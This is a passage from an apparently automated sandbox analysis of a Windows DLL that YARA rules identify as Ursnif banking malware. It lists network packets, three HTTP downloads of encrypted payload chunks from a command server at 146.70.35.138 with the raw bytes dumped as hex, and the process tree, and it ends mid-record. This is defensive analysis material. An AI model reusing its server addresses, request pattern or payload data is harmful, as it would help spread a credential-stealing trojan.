                          Apr 23, 2022 08:12:20.369841099 CEST4976680192.168.2.4146.70.35.138
                          Apr 23, 2022 08:12:20.369853973 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.369879007 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.369882107 CEST4976680192.168.2.4146.70.35.138
                          Apr 23, 2022 08:12:20.369931936 CEST4976680192.168.2.4146.70.35.138
                          Apr 23, 2022 08:12:20.370174885 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.370202065 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.370218039 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.370239973 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.370259047 CEST4976680192.168.2.4146.70.35.138
                          Apr 23, 2022 08:12:20.370285988 CEST4976680192.168.2.4146.70.35.138
                          Apr 23, 2022 08:12:20.393351078 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.396121025 CEST4976680192.168.2.4146.70.35.138
                          Apr 23, 2022 08:12:20.410522938 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.410547972 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.410562038 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.410579920 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.410598040 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.410609007 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.410725117 CEST4976680192.168.2.4146.70.35.138
                          Apr 23, 2022 08:12:20.410767078 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.410773993 CEST4976680192.168.2.4146.70.35.138
                          Apr 23, 2022 08:12:20.410815001 CEST4976680192.168.2.4146.70.35.138
                          Apr 23, 2022 08:12:20.410842896 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.410861969 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.410912037 CEST4976680192.168.2.4146.70.35.138
                          Apr 23, 2022 08:12:20.410948038 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.410972118 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.410988092 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.411020041 CEST4976680192.168.2.4146.70.35.138
                          Apr 23, 2022 08:12:20.411101103 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.411129951 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.411148071 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.411159039 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.411170959 CEST4976680192.168.2.4146.70.35.138
                          Apr 23, 2022 08:12:20.411206007 CEST4976680192.168.2.4146.70.35.138
                          Apr 23, 2022 08:12:20.411315918 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.412249088 CEST4976680192.168.2.4146.70.35.138

                          HTTP Request Dependency Graph

                          • 146.70.35.138

                          HTTP Packets

                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          0192.168.2.449766146.70.35.13880C:\Windows\SysWOW64\rundll32.exe
                          TimestampkBytes transferredDirectionData
                          Apr 23, 2022 08:12:19.910176992 CEST1224OUTGET /phpadmin/DRUYboFifxi6C3/_2BjVEcKiT1b8A_2BvMed/1ckh5D3V8MdKp2S2/SxMBQuJjSXDeW9Y/7fodbbXY21Jrsa2aXJ/S90Gqb_2B/KDYz_2F5NJsyx14KqPKz/ecUQVATr13lzZyN_2B_/2BoLTTXT06dmMNQURoEaga/M1AdtgAQJw1vj/q_2FSYWg/oo4zTjJDuzf2mz8BRfV3I9z/TX7m3RhRWd/LYr8gkK9WgmQ0jja9/kmBHLi0WTs_2/FFd4Km9NmRn/_2FUZ.src HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                          Host: 146.70.35.138
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Apr 23, 2022 08:12:20.288152933 CEST1238INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Sat, 23 Apr 2022 06:12:20 GMT
                          Content-Type: application/octet-stream
                          Content-Length: 185492
                          Connection: keep-alive
                          Pragma: public
                          Accept-Ranges: bytes
                          Expires: 0
                          Cache-Control: must-revalidate, post-check=0, pre-check=0
                          Content-Disposition: inline; filename="626398c43e1ae.bin"
                          Data Raw: 2c d4 68 ba 77 fa c2 de fe 95 8f 63 f1 45 56 5f 12 44 e4 30 5c f8 d2 eb ea 34 2c 15 08 e7 49 45 b8 f9 96 19 41 71 13 28 e7 22 8f 4d ba 44 b3 a3 6f 7b bf 72 ac b8 4f 7a 8f 60 a9 cb 6c 3d ef 2b e9 4b 6b 0d c8 68 41 c2 6d c2 e3 f9 cf c2 87 b7 ba 24 d1 5f c4 e4 11 7f 1c c7 6e f2 5e f5 c4 ad f7 ba 0b 19 f0 08 a6 0c 8c d6 7a ca 0e d2 e6 b9 3c 29 08 fd f9 f1 34 77 36 0b 69 d0 eb 4a 15 78 00 41 ee 63 8f 39 c4 83 84 54 5b 93 be 4b 41 ed 1d 77 6d c3 05 cd fb 5a 9e 69 00 27 b2 f8 28 22 b7 a6 fc e9 96 12 bf 16 16 9d 0b ee d7 ea 0d 29 ee 79 d6 f3 cc 9f 0b f5 7d b6 d6 9d bb 69 9e 76 c7 39 32 ee d6 d4 08 12 34 be c8 8e fb 1c 3d 89 fc bf 1e 9e 0e d2 b9 e2 14 bf 51 43 7d 58 21 d1 40 02 45 f3 45 af bc 93 a8 36 96 14 02 27 44 48 1d 0b 1f 08 60 72 20 55 8d 5f 3f 8c 71 71 8c e7 54 2b e2 cf f6 8d 2a df b4 82 9c 87 a5 18 0b 6f fb 3f 82 4c 5e aa 5a 08 af 9c 02 00 fb eb 9d d7 2f 90 11 fd 78 12 69 5c e2 38 4c 8c 6d 27 2d 35 3c 88 16 b7 9f 54 8f a5 4e e1 4b ea ff cb 25 a4 42 ea d4 1e 22 32 a7 6b d6 eb b7 2b c0 80 ad 13 44 6c 89 82 1e 7b 2c b0 71 05 65 75 d4 16 90 f9 f6 9e bf 21 86 69 02 07 a7 b5 02 b3 ec 6e 19 59 91 77 0a cd c7 f9 cf d0 06 50 8f db ab 03 f0 2b ed 2c e9 89 4a 88 59 8e 9c 7b de 14 fb 5f 7a df 0b 56 a9 b0 09 ba 19 86 1e 08 0f 71 f0 8e 65 83 4b a6 05 af 86 29 8c 39 c9 e2 36 a1 a4 0b 31 39 3a ee 98 85 08 ef f9 8a c4 bb ec bb 1f 9b 9f f4 c6 01 ad 17 12 ae cc 8a 29 41 89 52 e5 85 3e 09 15 69 93 24 9e f2 0d ae 0e 90 3c 47 2b 74 cd 39 1f dc 18 32 2f e0 00 8c d0 28 0e 13 d1 70 db 15 39 da 20 14 8b e0 b8 1b 3c 02 e0 b2 a5 3c ca fe e7 fb 71 b2 bc 46 2d bc b4 9e 2c 4d 42 51 60 d9 48 e0 73 ba b2 e6 ff cc b8 db 2e e2 47 db bb 09 3a b9 9f 21 fe 77 2e 1d b2 85 0d a1 6a 4b 3e 56 67 a8 28 25 b1 f2 cf ad c9 e6 f4 18 51 6f b6 b0 8a 87 9d fb ce 15 d9 a2 86 b4 13 c6 dd e0 49 26 f1 50 24 7d 04 14 ea d1 2d 24 e9 a6 f4 22 05 98 d9 91 38 e1 02 fb 62 5c 43 30 a0 74 a0 fe 8a 61 5b a4 5f 98 c5 39 06 b3 ff b3 25 3e 04 88 b4 82 83 94 64 a9 84 cb 9f 9f 1f 70 bf a6 3d 99 30 75 a2 26 ad af ef f7 ba 7e 13 36 dd ec 5b 00 93 21 74 eb 71 3e 31 3f 16 27 12 09 56 f4 b7 72 7d 36 19 03 2a 7c a9 f7 0e db 60 ea 21 0c ac 34 69 0b f0 81 dc 2d 5f e4 a4 b6 24 55 e6 24 ff de 1c d5 e9 18 d3 35 2a 51 65 b0 c5 0f d5 01 1b 9a a0 5e 93 f9 68 c7 00 64 1f 2c 80 f7 41 5f e5 a0 9d 2f c6 86 8f 6f 8b 9d 4c b1 75 fc 20 25 d0 69 a5 8d 42 8d 70 8d 86 c2 f3 67 47 48 b7 50 67 56 93 04 87 a8 94 6f b6 e3 87 a3 b4 4d 82 29 55 55 cc bf 88 0f b6 e6 4e 07 85 85 7b fd 4d fd 55 f7 b8 74 b1 8b 37 53 df fb 4f 98 6d 65 18 3a 85 dd 02 aa 7b f8 75 8a 02 bd 0a 6a 66 4a 19 f0 33 ea 01 93 bf 2a 36 65 f8 7e ef 26 c4 af a9 2e 18 c8 ed b3 86 8f 46 e9 a7 e4 ec 13 e5 6d 9b c1 09 49 cc 98 5f b5 0a 69 9d 1c e3 cc c3 38 81 ac 51 37 ad b2 6c 2f 7d 59 19 40 d7 7e f1 53 45 02 45 53 44 6c 2d 0d c7 9a 76 0c 41 e9 e0 e3 e8 77 65 0c 72 10 fe 62 87 ff 9f c1 11 34 4f a6 32 7d 9d 57 30 b5 40 b5 bb f8 5b 1b 7b 6f 92 b8 55 ce df 06 0e ce dd 7e ac 10 7e fd 5b dd 43 a7 d8 02 48 aa 68 37 27 8b 94 13 39 6a 48 27 0b 97 37 5f 35 45 41 33 2d 34 0a
                          Data Ascii: ,hwcEV_D0\4,IEAq("MDo{rOz`l=+KkhAm$_n^z<)4w6iJxAc9T[KAwmZi'(")y}iv924=QC}X!@EE6'DH`r U_?qqT+*o?L^Z/xi\8Lm'-5<TNK%B"2k+Dl{,qeu!inYwP+,JY{_zVqeK)9619:)AR>i$<G+t92/(p9 <<qF-,MBQ`Hs.G:!w.jK>Vg(%QoI&P$}-$"8b\C0ta[_9%>dp=0u&~6[!tq>1?'Vr}6*|`!4i-_$U$5*Qe^hd,A_/oLu %iBpgGHPgVoM)UUN{MUt7SOme:{ujfJ3*6e~&.FmI_i8Q7l/}Y@~SEESDl-vAwerb4O2}W0@[{oU~~[CHh7'9jH'7_5EA3-4
                          Apr 23, 2022 08:12:20.776896954 CEST1437OUTGET /phpadmin/GVoID0TbPRvLYlr7up2X9/gD2XQvRshzT0oIvQ/0mEtVI_2FJuzvKC/fbaZh1y3_2FnOqy8_2/B0Y8u0dqv/V11JJbfZHGLCQ043KVhZ/2j3FiaSLUSAIqnVTtEF/p_2F7mTRIgp_2F43j86HIJ/7JamWIlhMtaxW/Qv_2BsMI/GK_2BjMae66_2B0eWRxZare/pyglkGar6g/LD_2FkUNwRZVbFFyN/qmaS1_2FZd3W/iyocOp4EpCY/lkbOHJ4rs/yFlR4ppeN_2/FAS.src HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                          Host: 146.70.35.138
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Apr 23, 2022 08:12:21.151750088 CEST1460INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Sat, 23 Apr 2022 06:12:21 GMT
                          Content-Type: application/octet-stream
                          Content-Length: 237210
                          Connection: keep-alive
                          Pragma: public
                          Accept-Ranges: bytes
                          Expires: 0
                          Cache-Control: must-revalidate, post-check=0, pre-check=0
                          Content-Disposition: inline; filename="626398c51d112.bin"
                          Data Raw: c5 94 a1 d4 cf 01 54 ad 67 b8 35 ce fb a5 32 f4 b8 b7 20 18 bc af a0 b9 ec 7b fb 86 8b 40 5e 0c 4a 06 ae 62 ba 7e a8 0e 1b 4e 14 4a 61 22 66 60 c1 90 c2 5a 82 32 07 b5 0a 28 8e 7e ea 85 17 e2 57 83 3e 40 70 7a c8 68 8c 7d d1 83 2a 85 e7 64 0d ab 77 92 0b f8 d4 ae aa 6d 4c 70 33 cb 56 58 74 22 20 f5 7b 99 7b 0e 65 8e 51 07 ac ce 98 00 ec e4 f0 89 47 50 b4 65 b8 e6 23 43 ea 16 0d b5 8e 48 c9 d4 b9 c9 0f 48 2b 92 f5 d9 19 96 9f b7 32 8f 57 f8 3a 9c fc 78 1d 08 05 6b ca 6b 56 e1 08 8a 76 14 44 72 99 2e 7d 22 b0 6c 29 5b 8c 06 be c3 af d8 ef ff 64 73 b5 62 45 13 3e b1 99 c6 c3 60 ae 9b 3e dd 20 19 6a a3 cd 7a 59 d5 b4 c1 aa a6 dc 4b 26 e5 4e 0a ac 02 9b 15 7a 9d 51 f7 1e e8 c4 41 6e b0 8e ff d2 ab 95 a3 8f 5b f5 e4 4b 8d 05 c5 21 c3 0d 04 92 f1 83 5d d6 cd 19 d6 95 ef 7a 20 dc 91 10 4b 51 4d c4 2f 7e 03 c5 fb c7 08 d6 e6 74 2d 56 44 d8 a7 57 e5 91 1a 81 81 28 8e 88 63 7a 12 47 80 4d 99 4c 72 45 22 50 02 d6 85 c2 6c fd db 8c 27 af ef 7c 2f 5d 7c 0b e5 88 33 be dd 60 30 74 74 8c a3 06 b9 ed d1 2c 46 b0 e9 a1 97 b3 ea 80 a0 99 6b 07 3c 37 c9 12 1f ca d9 c3 f6 bb 95 dd 15 23 53 41 27 6f f3 b7 88 01 8a d4 d8 80 fd 64 fa 32 a6 51 db 9f c7 ee e4 2d 78 68 27 22 5a e0 e3 ba 67 38 ba 44 d8 c0 55 c4 ec 9a 89 db f1 e0 2e d2 f7 a6 dc 66 3e 69 cc e8 de eb f3 85 39 5d 45 7f b9 f1 d9 92 47 72 e8 1c dc 16 5f 94 8a 34 c6 6c c7 7f bf 51 e6 91 79 6b ec b5 f2 72 8a 6e b3 d4 29 d2 4a 3d 65 71 97 ed a8 79 9f fb cb 30 cc fd 81 1c 66 39 8a b5 b5 5f 2c dd e5 5b 58 45 3b 5a 92 5c 70 43 7f 69 e1 9b 6d 7f db ab 8b d9 4b ae 21 5f 89 c8 75 0c 23 18 67 b6 b0 86 9b cc 76 18 15 a9 b3 09 79 d9 aa 99 d5 8b c9 51 00 53 c1 31 2b cd 41 d0 8a 96 d9 92 f2 7f 67 79 25 7f e2 62 ad 75 e8 be a6 7a 01 eb 0c f3 5a 4c 9f 68 d1 7f e9 9e 7f 08 a9 1c 84 4b b7 f0 66 31 a6 2b 57 22 e5 0e 43 be b8 fc 02 48 c9 d3 b8 1c e9 cc 51 f3 27 a8 b6 0c 56 89 f3 0e 39 c0 70 63 51 a6 e5 fc 29 3c a8 0f ec 59 d0 f4 34 c5 27 e7 61 7b 18 d0 12 e9 ab 44 40 e0 f6 7f 5e 83 98 d8 bc 67 ce ce 0f e5 1f 97 a0 21 8a 8e bc 55 43 ed 76 28 e5 0b 47 e0 f3 ff d0 21 b2 bc 73 a8 04 22 a6 ff 80 9f 8f 27 4d 47 a6 c6 82 70 1a 05 2d e6 88 42 ba 6d eb 81 16 9c c2 93 e2 65 77 90 f6 1e fa 29 11 df 98 6b fa 90 d3 03 e2 3a e4 ea 7c 50 f4 57 34 74 0a ea 2a 2c c1 b6 1b 90 45 b5 a5 5d c8 a3 e5 2d c5 1b 47 36 e5 5e 5c ff 60 5b 86 7b 3a 3b 37 57 9d 83 86 72 e8 ac ff 51 7d 5b 56 f9 58 9b fc bd c3 ae 7f 17 f4 86 5d ac bf 83 30 cc a8 ac 1b 10 85 b4 67 38 3f 05 02 4b 10 c3 bc 6d cc 98 fe aa 9d fd 82 48 09 5f 6d c5 24 98 bc 1e 8d d0 32 3a be ba 5b cc 59 71 10 19 db f1 27 b4 18 19 51 81 c9 dc 2a 68 da d5 ca 34 87 4e 78 63 94 78 3a e6 ce 53 d9 88 10 f3 a7 80 63 78 a7 38 76 d7 18 61 67 78 00 29 51 09 8f 4c 89 4b ca 92 9c 13 7e 59 39 a0 51 aa fa d1 03 3b 4a 5f 67 d0 85 63 ea 30 6f 0d e8 09 ae 34 e7 8a 90 d9 95 4b fd 26 05 fb 0e 7c 02 b0 0c f9 67 df 98 0f 79 8c 6d ff 0c e7 be 6a b7 12 29 4d 0b 62 99 8f 98 67 62 02 8d b2 49 94 fa b5 be b0 ec 6a 9a af d8 30 7c aa 3f 85 d3 66 54 02 99 b6 98 bd be ce 73 8d 03 3f fe 89 4f 99 33 c1 d3 c5 bf fa 8b fb
                          Data Ascii: Tg52 {@^Jb~NJa"f`Z2(~W>@pzh}*dwmLp3VXt" {{eQGPe#CHH+2W:xkkVvDr.}"l)[dsbE>`> jzYK&NzQAn[K!]z KQM/~t-VDW(czGMLrE"Pl'|/]|3`0tt,Fk<7#SA'od2Q-xh'"Zg8DU.f>i9]EGr_4lQykrn)J=eqy0f9_,[XE;Z\pCimK!_u#gvyQS1+Agy%buzZLhKf1+W"CHQ'V9pcQ)<Y4'a{D@^g!UCv(G!s"'MGp-Bmew)k:|PW4t*,E]-G6^\`[{:;7WrQ}[VX]0g8?KmH_m$2:[Yq'Q*h4Nxcx:Scx8vagx)QLK~Y9Q;J_gc0o4K&|gymj)MbgbIj0|?fTs?O3
                          Apr 23, 2022 08:12:21.823791981 CEST1716OUTGET /phpadmin/Vo3V1ij8xfQAzbYEppxuGj/YfKBcB_2BiFsK/C5o_2FK1/LFX_2FAQmA1J0Gg2IGK0zii/Cqu4J51vDj/wlNBNCb18BPgk55aw/3DJofkjbHHw_/2F3O9t6XtUN/FhzyouLiXCH4qy/e6m_2F6Bp87emTDJkwB0B/GJSc0pfzfjLvMKIS/Fcz1B6FomHVea2H/3F6nRjbT0qghS0NNIb/kfO6CmRa0/E8U4GDXz2DXZU_2BDOzp/T84va5G8JnhB3/UMJfQ.src HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                          Host: 146.70.35.138
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Apr 23, 2022 08:12:22.199361086 CEST1717INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Sat, 23 Apr 2022 06:12:22 GMT
                          Content-Type: application/octet-stream
                          Content-Length: 1869
                          Connection: keep-alive
                          Pragma: public
                          Accept-Ranges: bytes
                          Expires: 0
                          Cache-Control: must-revalidate, post-check=0, pre-check=0
                          Content-Disposition: inline; filename="626398c6264cb.bin"
                          Data Raw: 40 d1 e5 5a 8b c7 b4 20 04 1d ee a2 24 f1 96 9d 26 a1 0b 1b 7e e3 4e 1f 5d 3c 4d da 10 7c 95 81 0f 16 f7 ee 7d fb 39 8c 70 71 45 d9 0f ab ad 60 01 a5 32 5d be 0d 61 0e 50 82 f8 65 5b 9a 22 17 77 7e df 1d d3 e9 2a 08 c4 85 a2 d9 7c 2f 82 76 1f a1 0c 49 88 f8 0e c9 2d a0 8a 50 56 c2 c7 92 94 e2 ec 7e 79 4a 65 9b 26 e4 dd 72 cc a9 e7 63 18 5b ca dd df b9 3c ff 59 43 c8 9c c3 1a 12 d9 00 09 54 eb 65 b3 47 f4 68 0c b2 8f b5 20 fb 61 ad f0 29 d6 ef 6f ad 1f 9b 0f 56 f2 39 7e b4 2e 17 15 94 17 47 de 21 36 e1 25 3a 1c 1e 8d 36 93 c2 c8 4e 60 10 93 49 cd cf 19 4f 0c 1f a5 d3 5d df 25 13 ca 40 20 64 fe 4b 27 eb fb 5b ce 56 73 77 b6 d4 6f 61 c2 6b 4e fe cb 73 77 22 e9 f6 1d 48 0c 2e 7a d7 73 4c e6 51 80 cb f5 e3 20 5b 24 a3 68 83 38 6a 87 1d d6 fc d3 cf f2 a2 a3 35 f3 19 e8 ac 2c e4 cb 70 a5 b0 92 e2 87 00 7b 31 2a 0d 22 de b4 1e 6d 5d 7c 13 90 ef 11 74 34 aa 7e 6b 92 3a e5 d5 5c be 59 0b ec ab 8a db cf 67 a8 2b 63 24 50 a1 20 ed 30 f3 e8 e0 28 6b 51 f4 5e e9 8f c2 69 d8 28 69 51 46 a7 72 50 9d 2a 97 f7 91 81 7c 6c 5a d0 ba ac bd 1c d8 97 9e 7f 2d 30 0e 8b 0a c6 f9 a4 b5 dc 66 f3 19 b7 79 89 51 9b eb 95 fa e6 32 f7 db 83 04 be d0 a4 34 40 10 7b e0 ea 75 18 6e 32 43 93 ff ec 97 e9 13 de b1 39 90 ae fd b1 88 f6 eb a8 a3 5f d3 40 f2 8a c8 1a b5 da 23 07 28 14 d4 48 91 e4 75 6c 2e 2f 59 14 ed cd 56 33 a4 6f 3c 74 70 51 26 d2 f1 00 9d c7 9e 68 ca 93 01 b0 18 8b 9c 3a 19 27 47 cf c7 cc f2 d1 42 aa e5 ce 1f 0f 07 03 9a 24 72 37 bc 30 c3 42 3d 57 49 09 18 78 26 bc 66 1e 36 de 2a c7 72 0d 10 ee fa 93 05 a5 63 7e 1c e1 d8 c6 71 0e 0f 77 91 6d aa 79 b3 3a 27 fe 2e 3b 53 ad 84 37 f4 45 54 52 da 80 67 3c 9c 44 86 2a a7 58 26 94 83 b1 bd ca d7 ad 1d 43 f8 70 2b 43 d2 05 fd d2 bd 6b 6f 62 28 7b 75 60 c4 14 07 07 2c f7 3e f3 95 1f 56 90 0c 06 3e 6c 02 6c 89 e1 6c 0b cb a0 a3 9c ba 25 72 e8 31 27 75 22 9d 20 f7 46 af 10 5d c0 d6 ec 16 ab 36 03 82 9f fb a2 ca 77 e2 f1 69 ad fe a5 b9 2c 1b 4a e3 1d 69 43 fc 81 b7 22 57 f1 2c fa 72 4d 17 49 56 ad 1f ff 4a a5 38 50 c9 b2 68 b3 c4 e2 33 e0 9b 81 eb 69 56 89 c3 9b 32 9c 57 30 ee 5d 75 8b e2 b2 d7 ee fb a8 48 a0 5e f2 34 a7 15 38 ac ae 28 2c 60 6f 00 b8 12 2b bf 5a 7d fc 9d 1c f0 1a dd a6 92 7f f1 c5 f3 02 e2 83 f6 a1 52 db f7 14 b9 38 35 28 e6 2b 62 1a 3f b8 e0 b5 43 ea a8 92 b6 60 5b 95 b3 d5 09 19 61 54 a7 f6 67 69 2b 6d 9e 93 4e 6a 56 d6 3f 53 09 df 02 18 fe f4 5e 79 48 1e 9b 82 dc cf fb 80 f3 bb 65 a6 56 0e 5a e8 78 a7 13 70 ac ce cc c9 43 75 3c f7 ef 58 23 f8 c7 88 e3 17 85 ca 17 bb 6e 86 b2 4d 6f 8a da 5c 1b 90 9a d2 4d 26 35 99 bb 8b 29 ea 31 7b 6b 5f b9 0e 00 3a a4 e4 ea 72 09 48 da 0c d2 ae 7f 25 91 ec 37 59 6e 37 a1 80 7c 8e 19 d1 1d 3a ee dc 6d 6a 4c 0b 42 b6 2b 61 83 0b d7 d9 f5 f6 ce 72 f7 b5 90 05 e5 3f 8a 59 21 da ac 86 48 37 1f 98 8f 3a 7e a8 72 fb a7 30 f0 f0 02 05 b3 ae ea dd 01 b1 44 fd d2 ee a8 d7 98 54 14 92 eb 8f 4e 62 a3 f2 7e 80 f8 92 9d 71 a2 ed 5c 8a 7c f2 dd 5c 75 7c 65 29 cd 7c e2 5d aa 2d f2 1d f5 f7 ab 93 ec 3b 66 10 48 80 13 8e 53 aa 6d ca d6 5e d2 47 e2 a0 4b fe ca fd 03 fd fa 45 3e c5 74
                          Data Ascii: @Z $&~N]<M|}9pqE`2]aPe["w~*|/vI-PV~yJe&rc[<YCTeGh a)oV9~.G!6%:6N`IO]%@ dK'[VswoakNsw"H.zsLQ [$h8j5,p{1*"m]|t4~k:\Yg+c$P 0(kQ^i(iQFrP*|lZ-0fyQ24@{un2C9_@#(Hul./YV3o<tpQ&h:'GB$r70B=WIx&f6*rc~qwmy:'.;S7ETRg<D*X&Cp+Ckob({u`,>V>lll%r1'u" F]6wi,JiC"W,rMIVJ8Ph3iV2W0]uH^48(,`o+Z}R85(+b?C`[aTgi+mNjV?S^yHeVZxpCu<X#nMo\M&5)1{k_:rH%7Yn7|:mjLB+ar?Y!H7:~r0DTNb~q\|\u|e)|]-;fHSm^GKE>t


                          Statistics

                          Behavior

                          Click to jump to process

                          System Behavior

                          General

                          Target ID:0
                          Start time:08:11:50
                          Start date:23/04/2022
                          Path:C:\Windows\System32\loaddll32.exe
                          Wow64 process (32bit):true
                          Commandline:loaddll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll"
                          Imagebase:0x990000
                          File size:116736 bytes
                          MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Target ID:1
                          Start time:08:11:51
                          Start date:23/04/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):true
                          Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1
                          Imagebase:0x1190000
                          File size:232960 bytes
                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Target ID:2
                          Start time:08:11:51
                          Start date:23/04/2022
                          Path:C:\Windows\SysWOW64\rundll32.exe
                          Wow64 process (32bit):true
                          Commandline:rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1
                          Imagebase:0x270000
                          File size:61952 bytes
                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.260779553.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.308220825.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.260884971.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.307999471.0000000004EF9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.309153947.0000000004D7C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.306041676.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.418290264.0000000004899000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.307957841.0000000004E7A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.261032532.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.261191379.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.260987111.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.261105592.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.261071181.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.365233310.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.261177888.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.420929959.0000000004BFF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:high

                          General

                          Target ID:4
                          Start time:08:11:53
                          Start date:23/04/2022
                          Path:C:\Windows\SysWOW64\WerFault.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 608
                          Imagebase:0x10e0000
                          File size:434592 bytes
                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Target ID:10
                          Start time:08:12:02
                          Start date:23/04/2022
                          Path:C:\Windows\SysWOW64\WerFault.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 616
                          Imagebase:0x1220000
                          File size:434592 bytes
                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Target ID:14
                          Start time:08:12:12
                          Start date:23/04/2022
                          Path:C:\Windows\SysWOW64\WerFault.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 608
                          Imagebase:0x1220000
                          File size:434592 bytes
